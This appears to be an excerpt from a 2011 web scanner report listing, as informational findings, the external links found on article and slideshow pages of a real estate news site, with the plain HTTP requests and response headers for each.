Date: Sat, 29 Jan 2011 23:50:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=367a75bcd14c4cb196afb625f0e472fc; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=999BDD41CFB14F40B6F8D0B1BA108F4E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.286. http://realestate.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /article.aspx?cp-documentid=26575425&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1bfe95ff9571433495df9b083be3b776; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=420410607C354E3D979F73C5FC7C1273; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 61517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345039&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Frealestate.redacted%2Farticle.aspx%3Fcp-documentid%3D26575425%26GT1%3D35006&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+backlog&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=2011+housing+market+flat&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Home-loan+program+oversight&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.redacted/i/2A/E3C886CAF6B03CEE763CBA591FEE6.jpg" alt="Businessweek.com" />
...[SNIP]...
<cite>By..Venessa Wong..of..<a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)">Bloomberg Businessweek</a>
...[SNIP]...
<li class="first"><a href="http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn">20 best places to start over</a>
...[SNIP]...
<li><a href="http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn">America's most discounted luxury apartments</a>
...[SNIP]...
<li class="last"><a href="http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn">America's highest-income cities by state</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=buy+new+or+existing+home&amp;form=MSREAL">Is it better to buy a new home or existing one?</a>
...[SNIP]...
ts in states such as North Carolina, Florida, California, Nevada and Colorado. The communities range from single-family developments to retirement communities with more than 700 units in Las Vegas and <a href="http://www.bing.com/search?q=Groveland%2C+Fla.&amp;form+MSREAL" onclick="window.open(this.href);return false;">Groveland, Fla.</a>
...[SNIP]...
<td><link rel="Stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" /><div id='PlayerAd1Container'></div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">See Businessweek.com's full list of where builders and investors foresee demand for new housing.</a>
...[SNIP]...
<em>Become a fan of MSN Real Estate on <a href="http://www.facebook.com/msnrealestate" onclick="window.open(this.href);return false;">Facebook</a> and follow us on <a href="http://www.twitter.com/msnrealestate" onclick="window.open(this.href);return false;">Twitter</a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XuTUE6Z__V9Jc2UnXh375rHRdBFs1Du5c?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XRJeEsaeX0k4CpjGoiuwKI3_2t4TLv8xC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.287. http://realestate.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /article.aspx?cp-documentid=26575425&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7eee375b1d22407bbacfe1374251ce3c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=323AB19601DE4D52A270DC812E6673C9; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:18 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 63026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406638&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Frealestate.redacted%2Farticle.aspx%3Fcp-documentid%3D26575425%26GT1%3D35006&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+backlog&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=2011+housing+market+flat&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Home-loan+program+oversight&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.redacted/i/2A/E3C886CAF6B03CEE763CBA591FEE6.jpg" alt="Businessweek.com" />
...[SNIP]...
<cite>By..Venessa Wong..of..<a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)">Bloomberg Businessweek</a>
...[SNIP]...
<li class="first"><a href="http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn">20 best places to start over</a>
...[SNIP]...
<li><a href="http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn">America's most discounted luxury apartments</a>
...[SNIP]...
<li class="last"><a href="http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn">America's highest-income cities by state</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=buy+new+or+existing+home&amp;form=MSREAL">Is it better to buy a new home or existing one?</a>
...[SNIP]...
ts in states such as North Carolina, Florida, California, Nevada and Colorado. The communities range from single-family developments to retirement communities with more than 700 units in Las Vegas and <a href="http://www.bing.com/search?q=Groveland%2C+Fla.&amp;form+MSREAL" onclick="window.open(this.href);return false;">Groveland, Fla.</a>
...[SNIP]...
<td><link rel="Stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" /><div id='PlayerAd1Container'></div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">See Businessweek.com's full list of where builders and investors foresee demand for new housing.</a>
...[SNIP]...
<em>Become a fan of MSN Real Estate on <a href="http://www.facebook.com/msnrealestate" onclick="window.open(this.href);return false;">Facebook</a> and follow us on <a href="http://www.twitter.com/msnrealestate" onclick="window.open(this.href);return false;">Twitter</a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-ec1f93fc4f4d26d0.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Winyanstaz Wakien
..(Wakien)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-ec1f93fc4f4d26d0.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mKQnyHF_7rQeXkioV9t_arBbl9bXsM3TUfSKMj8qNlS3Hfvv76H4KUdBq9lZTft8Jg-S3MpkQXZw0NrY-oobTcw" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XuTUE6Z__V9Jc2UnXh375rHRdBFs1Du5c?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XRJeEsaeX0k4CpjGoiuwKI3_2t4TLv8xC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.288. http://realestate.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /slideshow.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /slideshow.aspx?cp-documentid=26575521&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e6a7fa58f8b94050b87f463d0e8dd439; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5913AEC790E5421083D45541343E0655; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 90700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345038&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Frealestate.redacted%2Fslideshow.aspx%3Fcp-documentid%3D26575521%26GT1%3D35006&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+backlog&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=2011+housing+market+flat&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Home-loan+program+oversight&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.redacted/i/2A/E3C886CAF6B03CEE763CBA591FEE6.jpg" alt="Businessweek.com" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbCErejGBG1rBcuXycQTC62Ud7gg-UXzC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbCErejGBG1rBcuXycQTC62Ud7gg-UXzC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">r o
..(slipknot5)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Mike
..(NVanHiker)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XvgmAjW84eGy9BG6AfkU-R6gqzOZgVQ3S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xe5O5VlyfapbVN-GEcOvz6W3nOdlWyW3t?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XH8Fy7nb0e1GxFNmsT2hMGXMVfxuBVI4B?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X49jbZo-ohyOnFTgS1AOCiqc8mMx2M0I-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XKxTYsjc84a0aG718B9_caPd4garD3zIY?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
is all I see in this story. some body simply can see some thing that they use allot of so they buy what they can, this is good for the economy, and what is good for the economy is good for all of us. <img src="http://us.social.s-redacted/s/images/emoticons/49_49.gif" alt="Nerd" class="emoticon" /></p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XlyG_cmb52KYMyLTPt7bS5-_XZMr5zSgA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<cite>By..Venessa Wong..of..<a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)">Bloomberg Businessweek</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=Median+Home+Prices+by+State&amp;FORM=MSREAL" onclick="window.open(this.href);return false;">What's the median home price in your area?</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://delwebb.com/communities/tx/richmond/del-webb-houston/index.aspx" onclick="window.open(this.href);return false;">Del Webb Sweetgrass</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<p>According to the community's <a href="http://cpwliving.com/" onclick="window.open(this.href);return false;">website</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<br />Approved by the town of <a href="http://www.bing.com/search?q=apex%2C+n.c.&amp;go=&amp;form=MSREAL" onclick="window.open(this.href);return false;">Apex</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=Median+Home+Prices+by+State&amp;FORM=MSREAL" onclick="window.open(this.href);return false;">What's the median home price in your area?</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
